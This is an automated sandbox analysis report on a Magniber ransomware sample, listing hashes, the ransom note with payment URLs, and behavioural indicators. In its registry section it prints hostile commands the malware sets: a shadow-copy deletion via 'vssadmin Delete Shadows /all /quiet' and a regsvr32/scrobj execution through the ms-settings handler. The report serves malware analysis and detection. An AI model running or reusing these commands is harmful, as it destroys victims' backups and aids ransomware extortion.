magniber | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367

Analysis

max time kernel
136s
max time network
127s
platform
windows10_x64
resource
win10-en-20211014
submitted
18-10-2021 19:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Size

22KB
MD5

7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1

e7304e2436dc0eddddba229f1ec7145055030151
SHA256

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
SHA512

c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://ce7c208812783e608eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://ce7c208812783e608eltalkfzj.jobsbig.cam/eltalkfzj http://ce7c208812783e608eltalkfzj.boxgas.icu/eltalkfzj http://ce7c208812783e608eltalkfzj.sixsees.club/eltalkfzj http://ce7c208812783e608eltalkfzj.nowuser.casa/eltalkfzj Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://ce7c208812783e608eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj

http://ce7c208812783e608eltalkfzj.jobsbig.cam/eltalkfzj

http://ce7c208812783e608eltalkfzj.boxgas.icu/eltalkfzj

http://ce7c208812783e608eltalkfzj.sixsees.club/eltalkfzj

http://ce7c208812783e608eltalkfzj.nowuser.casa/eltalkfzj

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 14 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4228	2728	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4220	2728	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4296	2728	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4324	2728	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4368	2728	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4460	2728	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4520	2728	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4672	2728	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4708	2728	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4732	2728	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4804	2728	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4816	2728	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5008	2728	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5036	2728	cmd.exe

Modifies extensions of user files 10 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

sihost.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\CheckpointResolve.tiff => C:\Users\Admin\Pictures\CheckpointResolve.tiff.eltalkfzj	sihost.exe
File opened for modification	C:\Users\Admin\Pictures\CompareUpdate.tiff	sihost.exe
File renamed	C:\Users\Admin\Pictures\ConfirmImport.png => C:\Users\Admin\Pictures\ConfirmImport.png.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\ResetSend.tif => C:\Users\Admin\Pictures\ResetSend.tif.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\UnblockSearch.png => C:\Users\Admin\Pictures\UnblockSearch.png.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\HideUndo.raw => C:\Users\Admin\Pictures\HideUndo.raw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\WriteStop.crw => C:\Users\Admin\Pictures\WriteStop.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\CompareUpdate.tiff => C:\Users\Admin\Pictures\CompareUpdate.tiff.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\EnterCompress.raw => C:\Users\Admin\Pictures\EnterCompress.raw.eltalkfzj	sihost.exe
File opened for modification	C:\Users\Admin\Pictures\CheckpointResolve.tiff	sihost.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation cmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation	cmd.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

description	pid	process	target process
PID 1556 set thread context of 2320	1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	sihost.exe
PID 1556 set thread context of 2332	1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	svchost.exe
PID 1556 set thread context of 2732	1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	taskhostw.exe
PID 1556 set thread context of 3008	1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	Explorer.EXE
PID 1556 set thread context of 3456	1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	RuntimeBroker.exe
PID 1556 set thread context of 3644	1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	DllHost.exe

Drops file in Windows directory 4 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1488 3644 WerFault.exe DllHost.exe

pid	pid_target	process	target process
1488	3644	WerFault.exe	DllHost.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

Processes:

svchost.exeMicrosoftEdge.exeExplorer.EXEMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeRuntimeBroker.exeMicrosoftEdgeCP.exe1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exesihost.exetaskhostw.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{F9CED656-B564-4920-88E4-A866820074CD} = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete\C:\Users\Admin\AppData\Local\Packa = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 3c5e1ed553c4d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{EFF7CBEB-E7F0-4D09-A1D8-2F5E24BE2396}"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 25b0743d06c1d701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\ClearBrowsingHistoryOnStart = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 25b0743d06c1d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 2a421cd253c4d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000793224a0592b8d54837c0a0492d4593309e945c09d57630cee071645f202cd22e0ed6a152299b8f07b530902fbf03b6e9ab4ba6a90939d0a6473501f1f61e2aa3df2d47eea2bdeea05bbedc6c660557084dd23504bd7c6ee0cdb	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\LastClosedWidth = "800"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\Children\S-1-15-2-36240 = "microsoft.microsoftedge_8wekyb3d8bbwe"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "u4lrr3f"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\Children\S-1-15-2-36240 = "006"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy	MicrosoftEdge.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

1272 notepad.exe

pid	process
1272	notepad.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exeWerFault.exe

pid	process
1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
1488	WerFault.exe
1488	WerFault.exe
1488	WerFault.exe
1488	WerFault.exe
1488	WerFault.exe
1488	WerFault.exe
1488	WerFault.exe
1488	WerFault.exe
1488	WerFault.exe
1488	WerFault.exe
1488	WerFault.exe
1488	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3008 Explorer.EXE

pid	process
3008	Explorer.EXE

Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exeMicrosoftEdgeCP.exe

pid	process
1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2364	MicrosoftEdgeCP.exe
2364	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WerFault.exeExplorer.EXEWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1488	WerFault.exe
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
